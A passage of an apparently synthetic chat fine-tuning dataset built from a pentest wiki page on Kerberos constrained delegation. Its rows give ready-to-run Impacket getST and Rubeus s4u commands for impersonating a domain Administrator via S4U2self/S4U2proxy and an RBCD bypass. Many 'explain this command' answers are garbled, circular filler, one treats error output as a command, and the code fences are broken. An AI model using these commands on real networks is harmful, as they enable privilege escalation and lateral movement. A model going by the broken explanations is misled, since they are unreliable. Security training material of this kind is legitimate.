transition?"}, {"role": "assistant", "content": "getST -spn \"cifs/target\" -impersonate \"Administrator\" \"$DOMAIN\"/\"$USER\":\"$PASSWORD\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the getST syntax for (kcd) constrained - with protocol transition?", "response": "getST -spn \"cifs/target\" -impersonate \"Administrator\" \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"", "metadata": {"corpus_index": 517, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/constrained.md", "page_title": "(KCD) Constrained", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "getST"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on (KCD) Constrained - With protocol transition"}, {"role": "assistant", "content": "getST -spn \"cifs/target\" -impersonate \"Administrator\" \"$DOMAIN\"/\"$USER\":\"$PASSWORD\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on (KCD) Constrained - With protocol transition", "response": "getST -spn \"cifs/target\" -impersonate \"Administrator\" \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"", "metadata": {"corpus_index": 517, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/constrained.md", "page_title": "(KCD) Constrained", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `getST -spn \"cifs/target\" -impersonate \"Administrator\" \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"`?"}, {"role": "assistant", "content": "This command is used for (kcd) constrained - with protocol transition. With protocol transition"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `getST -spn \"cifs/target\" -impersonate \"Administrator\" \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"`?", "response": "This command is used for (kcd) constrained - with protocol transition. With protocol transition", "metadata": {"corpus_index": 517, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/constrained.md", "page_title": "(KCD) Constrained", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through (KCD) Constrained - With protocol transition"}, {"role": "assistant", "content": "> [-] Kerberos SessionError: KDC_ERR_BADOPTION(KDC cannot accommodate requested option)\n> [-] Probably SPN is not allowed to delegate by user user1 or initial TGT not forwardable\n> ```\n> \n> When attempting to exploit that technique, if the error above triggers, it means that either\n> \n> * the account was sensitive for delegation, or a member of the \"Protected Users\" group.\n> * or the constrained delegations are configured [without protocol transition](constrained.md#without-protocol-transition)\n\n\n=== Windows\n\nFrom Windows machines, [Rubeus](https://github.com/GhostPack/Rubeus) (C#) can be used to conduct a full S4U2 attack (S4U2self + S4U2proxy)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through (KCD) Constrained - With protocol transition", "response": "> [-] Kerberos SessionError: KDC_ERR_BADOPTION(KDC cannot accommodate requested option)\n> [-] Probably SPN is not allowed to delegate by user user1 or initial TGT not forwardable\n> ```\n> \n> When attempting to exploit that technique, if the error above triggers, it means that either\n> \n> * the account was sensitive for delegation, or a member of the \"Protected Users\" group.\n> * or the constrained delegations are configured [without protocol transition](constrained.md#without-protocol-transition)\n\n\n=== Windows\n\nFrom Windows machines, [Rubeus](https://github.com/GhostPack/Rubeus) (C#) can be used to conduct a full S4U2 attack (S4U2self + S4U2proxy).", "metadata": {"corpus_index": 518, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/constrained.md", "page_title": "(KCD) Constrained", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `> [-] Kerberos SessionError: KDC_ERR_BADOPTION(KDC cannot accommodate requested option)`?"}, {"role": "assistant", "content": "This command is used for (kcd) constrained - with protocol transition. With protocol transition"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `> [-] Kerberos SessionError: KDC_ERR_BADOPTION(KDC cannot accommodate requested option)`?", "response": "This command is used for (kcd) constrained - with protocol transition. With protocol transition", "metadata": {"corpus_index": 518, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/constrained.md", "page_title": "(KCD) Constrained", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of (KCD) Constrained - Without protocol transition"}, {"role": "assistant", "content": "![]()\nDomain Controller > Active Directory Users and Computers > delegation properties of a user{.caption}\n\nIf a service is configured with constrained delegation without protocol transition (i.e. set with \"Kerberos only\"), then S4U2self requests won't result in forwardable service tickets, hence failing at providing the requirement for S4U2proxy to work.\n\nThis means the service cannot, by itself, obtain a forwardable ticket for a user to itself (i.e. what S4U2Self is used for). A service ticket will be obtained, but it won't be forwardable. And S4U2Proxy usually needs an forwardable ST to work.\n\nThere are two known ways attackers can use to bypass this and obtain a forwardable ticket, on behalf of a user, to the requesting service (i.e. what S4U2Self would be used for):\n\n1. By operating an RBCD attack on the service.\n2. By forcing or waiting for a user to authenticate to the service while a \"Kerberos listener\" is running.\n\nWhile the \"ticket capture\" way would theoretically work, the RBCD approach is preferred since it doesn't require control over the service's SPN's host (needed to start a Kerberos listener). Consequently, only the RBCD approach is described here at the moment."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of (KCD) Constrained - Without protocol transition", "response": "![]()\nDomain Controller > Active Directory Users and Computers > delegation properties of a user{.caption}\n\nIf a service is configured with constrained delegation without protocol transition (i.e. set with \"Kerberos only\"), then S4U2self requests won't result in forwardable service tickets, hence failing at providing the requirement for S4U2proxy to work.\n\nThis means the service cannot, by itself, obtain a forwardable ticket for a user to itself (i.e. what S4U2Self is used for). A service ticket will be obtained, but it won't be forwardable. And S4U2Proxy usually needs an forwardable ST to work.\n\nThere are two known ways attackers can use to bypass this and obtain a forwardable ticket, on behalf of a user, to the requesting service (i.e. what S4U2Self would be used for):\n\n1. By operating an RBCD attack on the service.\n2. By forcing or waiting for a user to authenticate to the service while a \"Kerberos listener\" is running.\n\nWhile the \"ticket capture\" way would theoretically work, the RBCD approach is preferred since it doesn't require control over the service's SPN's host (needed to start a Kerberos listener). Consequently, only the RBCD approach is described here at the moment.", "metadata": {"corpus_index": 519, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/constrained.md", "page_title": "(KCD) Constrained", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for (KCD) Constrained - Without protocol transition"}, {"role": "assistant", "content": "![]()\nDomain Controller > Active Directory Users and Computers > delegation properties of a user{.caption}\n\nIf a service is configured with constrained delegation without protocol transition (i.e. set with \"Kerberos only\"), then S4U2self requests won't result in forwardable service tickets, hence failing at providing the requirement for S4U2proxy to work.\n\nThis means the service cannot, by itself, obtain a forwardable ticket for a user to itself (i.e. what S4U2Self is used for). A service ticket will be obtained, but it won't be forwardable. And S4U2Proxy usually needs an forwardable ST to work.\n\nThere are two known ways attackers can use to bypass this and obtain a forwardable ticket, on behalf of a user, to the requesting service (i.e. what S4U2Self would be used for):\n\n1. By operating an RBCD attack on the service.\n2. By forcing or waiting for a user to authenticate to the service while a \"Kerberos listener\" is running.\n\nWhile the \"ticket capture\" way would theoretically work, the RBCD approach is preferred since it doesn't require control over the service's SPN's host (needed to start a Kerberos listener). Consequently, only the RBCD approach is described here at the moment."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for (KCD) Constrained - Without protocol transition", "response": "![]()\nDomain Controller > Active Directory Users and Computers > delegation properties of a user{.caption}\n\nIf a service is configured with constrained delegation without protocol transition (i.e. set with \"Kerberos only\"), then S4U2self requests won't result in forwardable service tickets, hence failing at providing the requirement for S4U2proxy to work.\n\nThis means the service cannot, by itself, obtain a forwardable ticket for a user to itself (i.e. what S4U2Self is used for). A service ticket will be obtained, but it won't be forwardable. And S4U2Proxy usually needs an forwardable ST to work.\n\nThere are two known ways attackers can use to bypass this and obtain a forwardable ticket, on behalf of a user, to the requesting service (i.e. what S4U2Self would be used for):\n\n1. By operating an RBCD attack on the service.\n2. By forcing or waiting for a user to authenticate to the service while a \"Kerberos listener\" is running.\n\nWhile the \"ticket capture\" way would theoretically work, the RBCD approach is preferred since it doesn't require control over the service's SPN's host (needed to start a Kerberos listener). Consequently, only the RBCD approach is described here at the moment.", "metadata": {"corpus_index": 519, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/constrained.md", "page_title": "(KCD) Constrained", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of (KCD) Constrained - RBCD approach"}, {"role": "assistant", "content": "The service account (called serviceA) configured for KCD needs to be configured for RBCD (Resource-Based Constrained Delegations). The service's msDS-AllowedToActOnBehalfOfOtherIdentity attribute needs to be appended with an account controlled by the attacker (e.g. serviceB). The attacker-controlled account must meet the necessary requirements for service ticket requests (i.e. have at least one SPN, or have its sAMAccountName end with $)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of (KCD) Constrained - RBCD approach", "response": "The service account (called serviceA) configured for KCD needs to be configured for RBCD (Resource-Based Constrained Delegations). The service's msDS-AllowedToActOnBehalfOfOtherIdentity attribute needs to be appended with an account controlled by the attacker (e.g. serviceB). The attacker-controlled account must meet the necessary requirements for service ticket requests (i.e. have at least one SPN, or have its sAMAccountName end with $).", "metadata": {"corpus_index": 520, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/constrained.md", "page_title": "(KCD) Constrained", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on (KCD) Constrained - RBCD approach"}, {"role": "assistant", "content": "The service account (called serviceA) configured for KCD needs to be configured for RBCD (Resource-Based Constrained Delegations). The service's msDS-AllowedToActOnBehalfOfOtherIdentity attribute needs to be appended with an account controlled by the attacker (e.g. serviceB). The attacker-controlled account must meet the necessary requirements for service ticket requests (i.e. have at least one SPN, or have its sAMAccountName end with $)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on (KCD) Constrained - RBCD approach", "response": "The service account (called serviceA) configured for KCD needs to be configured for RBCD (Resource-Based Constrained Delegations). The service's msDS-AllowedToActOnBehalfOfOtherIdentity attribute needs to be appended with an account controlled by the attacker (e.g. serviceB). The attacker-controlled account must meet the necessary requirements for service ticket requests (i.e. have at least one SPN, or have its sAMAccountName end with $).", "metadata": {"corpus_index": 520, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/constrained.md", "page_title": "(KCD) Constrained", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does (KCD) Constrained - 1. Full S4U2 (self + proxy) work?"}, {"role": "assistant", "content": "The attacker can then proceed to a full S4U attack (S4U2self + S4U2proxy, a standard RBCD attack or KCD with protocol transition) to obtain a forwardable ST from a user to one of serviceA's SPNs, using serviceB's credentials.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's getST (Python) script can be used for that purpose.\n\n``bash\ngetST -spn \"cifs/serviceA\" -impersonate \"administrator\" \"domain/serviceB:password\"\n`\n\n=== Windows\n\nFrom Windows machines, Rubeus (C#) can be used to conduct a full S4U2 attack (S4U2self + S4U2proxy)\n\n`powershell\nRubeus.exe s4u /nowrap /msdsspn:\"cifs/target\" /impersonateuser:\"administrator\" /domain:\"domain\" /user:\"user\" /password:\"password\"\n``\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does (KCD) Constrained - 1. Full S4U2 (self + proxy) work?", "response": "The attacker can then proceed to a full S4U attack (S4U2self + S4U2proxy, a standard RBCD attack or KCD with protocol transition) to obtain a forwardable ST from a user to one of serviceA's SPNs, using serviceB's credentials.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's getST (Python) script can be used for that purpose.\n\n``bash\ngetST -spn \"cifs/serviceA\" -impersonate \"administrator\" \"domain/serviceB:password\"\n`\n\n=== Windows\n\nFrom Windows machines, Rubeus (C#) can be used to conduct a full S4U2 attack (S4U2self + S4U2proxy)\n\n`powershell\nRubeus.exe s4u /nowrap /msdsspn:\"cifs/target\" /impersonateuser:\"administrator\" /domain:\"domain\" /user:\"user\" /password:\"password\"\n``\n\n:::", "metadata": {"corpus_index": 521, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/constrained.md", "page_title": "(KCD) Constrained", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out (KCD) Constrained - 1. Full S4U2 (self + proxy) during a pentest?"}, {"role": "assistant", "content": "The attacker can then proceed to a full S4U attack (S4U2self + S4U2proxy, a standard RBCD attack or KCD with protocol transition) to obtain a forwardable ST from a user to one of serviceA's SPNs, using serviceB's credentials.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's getST (Python) script can be used for that purpose.\n\n``bash\ngetST -spn \"cifs/serviceA\" -impersonate \"administrator\" \"domain/serviceB:password\"\n`\n\n=== Windows\n\nFrom Windows machines, Rubeus (C#) can be used to conduct a full S4U2 attack (S4U2self + S4U2proxy)\n\n`powershell\nRubeus.exe s4u /nowrap /msdsspn:\"cifs/target\" /impersonateuser:\"administrator\" /domain:\"domain\" /user:\"user\" /password:\"password\"\n``\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out (KCD) Constrained - 1. Full S4U2 (self + proxy) during a pentest?", "response": "The attacker can then proceed to a full S4U attack (S4U2self + S4U2proxy, a standard RBCD attack or KCD with protocol transition) to obtain a forwardable ST from a user to one of serviceA's SPNs, using serviceB's credentials.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's getST (Python) script can be used for that purpose.\n\n``bash\ngetST -spn \"cifs/serviceA\" -impersonate \"administrator\" \"domain/serviceB:password\"\n`\n\n=== Windows\n\nFrom Windows machines, Rubeus (C#) can be used to conduct a full S4U2 attack (S4U2self + S4U2proxy)\n\n`powershell\nRubeus.exe s4u /nowrap /msdsspn:\"cifs/target\" /impersonateuser:\"administrator\" /domain:\"domain\" /user:\"user\" /password:\"password\"\n``\n\n:::", "metadata": {"corpus_index": 521, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/constrained.md", "page_title": "(KCD) Constrained", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use getST for (kcd) constrained - 1. full s4u2 (self + proxy)?"}, {"role": "assistant", "content": "getST -spn \"cifs/serviceA\" -impersonate \"administrator\" \"domain/serviceB:password\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use getST for (kcd) constrained - 1. full s4u2 (self + proxy)?", "response": "getST -spn \"cifs/serviceA\" -impersonate \"administrator\" \"domain/serviceB:password\"", "metadata": {"corpus_index": 522, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/constrained.md", "page_title": "(KCD) Constrained", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "getST"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through (KCD) Constrained - 1. Full S4U2 (self + proxy)"}, {"role": "assistant", "content": "getST -spn \"cifs/serviceA\" -impersonate \"administrator\" \"domain/serviceB:password\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through (KCD) Constrained - 1. Full S4U2 (self + proxy)", "response": "getST -spn \"cifs/serviceA\" -impersonate \"administrator\" \"domain/serviceB:password\"", "metadata": {"corpus_index": 522, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/constrained.md", "page_title": "(KCD) Constrained", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `getST -spn \"cifs/serviceA\" -impersonate \"administrator\" \"domain/serviceB:password\"`?"}, {"role": "assistant", "content": "This command is used for (kcd) constrained - 1. full s4u2 (self + proxy). 1. Full S4U2 (self + proxy)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `getST -spn \"cifs/serviceA\" -impersonate \"administrator\" \"domain/serviceB:password\"`?", "response": "This command is used for (kcd) constrained - 1. full s4u2 (self + proxy). 1. Full S4U2 (self + proxy)", "metadata": {"corpus_index": 522, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/constrained.md", "page_title": "(KCD) Constrained", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the Rubeus.exe command for (kcd) constrained - 1. full s4u2 (self + proxy)"}, {"role": "assistant", "content": "Rubeus.exe s4u /nowrap /msdsspn:\"cifs/target\" /impersonateuser:\"administrator\" /domain:\"domain\" /user:\"user\" /password:\"password\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the Rubeus.exe command for (kcd) constrained - 1. full s4u2 (self + proxy)", "response": "Rubeus.exe s4u /nowrap /msdsspn:\"cifs/target\" /impersonateuser:\"administrator\" /domain:\"domain\" /user:\"user\" /password:\"password\"", "metadata": {"corpus_index": 523, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/constrained.md", "page_title": "(KCD) Constrained", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Rubeus.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do (KCD) Constrained - 1. Full S4U2 (self + proxy)"}, {"role": "assistant", "content": "Rubeus.exe s4u /nowrap /msdsspn:\"cifs/target\" /impersonateuser:\"administrator\" /domain:\"domain\" /user:\"user\" /password:\"password\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do (KCD) Constrained - 1. Full S4U2 (self + proxy)", "response": "Rubeus.exe s4u /nowrap /msdsspn:\"cifs/target\" /impersonateuser:\"administrator\" /domain:\"domain\" /user:\"user\" /password:\"password\"", "metadata": {"corpus_index": 523, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/constrained.md", "page_title": "(KCD) Constrained", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Rubeus.exe s4u /nowrap /msdsspn:\"cifs/target\" /impersonateuser:\"administrator\" /domain:\"domain\" /user:\"user\" /password:\"password\"`?"}, {"role": "assistant", "content": "This command is used for (kcd) constrained - 1. full s4u2 (self + proxy). 1. Full S4U2 (self + proxy)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Rubeus.exe s4u /nowrap /msdsspn:\"cifs/target\" /impersonateuser:\"administrator\" /domain:\"domain\" /user:\"user\" /password:\"password\"`?", "response": "This command is used for (kcd) constrained - 1. full s4u2 (self + proxy). 1. Full S4U2 (self + proxy)", "metadata": {"corpus_index": 523, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/constrained.md", "page_title": "(KCD) Constrained", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain (KCD) Constrained - 2. Additional S4U2proxy"}, {"role": "assistant", "content": "Once the ticket is obtained, it can be used in a S4U2proxy request, made by serviceA, on behalf of the impersonated user, to obtain access to one of the services serviceA can delegate to.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's getST (Python) script can be used for that purpose.\n\n``bash\ngetST -spn \"cifs/target\" -impersonate \"administrator\" -additional-ticket \"administrator.ccache\" \"domain/serviceA:password\"\n`\n\n=== Windows\n\nFrom Windows machines, Rubeus (C#) can be used to obtain a Service Ticket through an S4U2proxy request, supplying as \"additional ticket\" the Service Ticket obtained before. \n\n`powershell\nRubeus.exe s4u /nowrap /msdsspn:\"cifs/target\" /impersonateuser:\"administrator\" /tgs:\"base64 | file.kirbi\" /domain:\"domain\" /user:\"user\" /password:\"password\"\n`\n\n:::\n\n> [!TIP]\n> Computer accounts can edit their own \"rbcd attribute\" (i.e. msDS-AllowedToActOnBehalfOfOtherIdentity`). If the account configured with KCD without protocol transition is a computer, controlling another account to operate the RBCD approach is not needed. In this case, serviceB = serviceA, the computer account can be configured for a \"self-rbcd\".\n> \n> Nota bene: around Aug./Sept. 2022, Microsoft seems to have patched the \"self-rbcd\" approach, but relying on another account for the RBCD will still work."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain (KCD) Constrained - 2. Additional S4U2proxy", "response": "Once the ticket is obtained, it can be used in a S4U2proxy request, made by serviceA, on behalf of the impersonated user, to obtain access to one of the services serviceA can delegate to.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's getST (Python) script can be used for that purpose.\n\n``bash\ngetST -spn \"cifs/target\" -impersonate \"administrator\" -additional-ticket \"administrator.ccache\" \"domain/serviceA:password\"\n`\n\n=== Windows\n\nFrom Windows machines, Rubeus (C#) can be used to obtain a Service Ticket through an S4U2proxy request, supplying as \"additional ticket\" the Service Ticket obtained before. \n\n`powershell\nRubeus.exe s4u /nowrap /msdsspn:\"cifs/target\" /impersonateuser:\"administrator\" /tgs:\"base64 | file.kirbi\" /domain:\"domain\" /user:\"user\" /password:\"password\"\n`\n\n:::\n\n> [!TIP]\n> Computer accounts can edit their own \"rbcd attribute\" (i.e. msDS-AllowedToActOnBehalfOfOtherIdentity`). If the account configured with KCD without protocol transition is a computer, controlling another account to operate the RBCD approach is not needed. In this case, serviceB = serviceA, the computer account can be configured for a \"self-rbcd\".\n> \n> Nota bene: around Aug./Sept. 2022, Microsoft seems to have patched the \"self-rbcd\" approach, but relying on another account for the RBCD will still work.", "metadata": {"corpus_index": 524, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/constrained.md", "page_title": "(KCD) Constrained", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through (KCD) Constrained - 2. Additional S4U2proxy"}, {"role": "assistant", "content": "Once the ticket is obtained, it can be used in a S4U2proxy request, made by serviceA, on behalf of the impersonated user, to obtain access to one of the services serviceA can delegate to.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's getST (Python) script can be used for that purpose.\n\n``bash\ngetST -spn \"cifs/target\" -impersonate \"administrator\" -additional-ticket \"administrator.ccache\" \"domain/serviceA:password\"\n`\n\n=== Windows\n\nFrom Windows machines, Rubeus (C#) can be used to obtain a Service Ticket through an S4U2proxy request, supplying as \"additional ticket\" the Service Ticket obtained before. \n\n`powershell\nRubeus.exe s4u /nowrap /msdsspn:\"cifs/target\" /impersonateuser:\"administrator\" /tgs:\"base64 | file.kirbi\" /domain:\"domain\" /user:\"user\" /password:\"password\"\n`\n\n:::\n\n> [!TIP]\n> Computer accounts can edit their own \"rbcd attribute\" (i.e. msDS-AllowedToActOnBehalfOfOtherIdentity`). If the account configured with KCD without protocol transition is a computer, controlling another account to operate the RBCD approach is not needed. In this case, serviceB = serviceA, the computer account can be configured for a \"self-rbcd\".\n> \n> Nota bene: around Aug./Sept. 2022, Microsoft seems to have patched the \"self-rbcd\" approach, but relying on another account for the RBCD will still work."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through (KCD) Constrained - 2. Additional S4U2proxy", "response": "Once the ticket is obtained, it can be used in a S4U2proxy request, made by serviceA, on behalf of the impersonated user, to obtain access to one of the services serviceA can delegate to.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's getST (Python) script can be used for that purpose.\n\n``bash\ngetST -spn \"cifs/target\" -impersonate \"administrator\" -additional-ticket \"administrator.ccache\" \"domain/serviceA:password\"\n`\n\n=== Windows\n\nFrom Windows machines, Rubeus (C#) can be used to obtain a Service Ticket through an S4U2proxy request, supplying as \"additional ticket\" the Service Ticket obtained before. \n\n`powershell\nRubeus.exe s4u /nowrap /msdsspn:\"cifs/target\" /impersonateuser:\"administrator\" /tgs:\"base64 | file.kirbi\" /domain:\"domain\" /user:\"user\" /password:\"password\"\n`\n\n:::\n\n> [!TIP]\n> Computer accounts can edit their own \"rbcd attribute\" (i.e. msDS-AllowedToActOnBehalfOfOtherIdentity`). If the account configured with KCD without protocol transition is a computer, controlling another account to operate the RBCD approach is not needed. In this case, serviceB = serviceA, the computer account can be configured for a \"self-rbcd\".\n> \n> Nota bene: around Aug./Sept. 2022, Microsoft seems to have patched the \"self-rbcd\" approach, but relying on another account for the RBCD will still work.", "metadata": {"corpus_index": 524, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/constrained.md", "page_title": "(KCD) Constrained", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the getST command to (kcd) constrained - 2. additional s4u2proxy"}, {"role": "assistant", "content": "getST -spn \"cifs/target\" -impersonate \"administrator\" -additional-ticket \"administrator.ccache\" \"domain/serviceA:password\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to 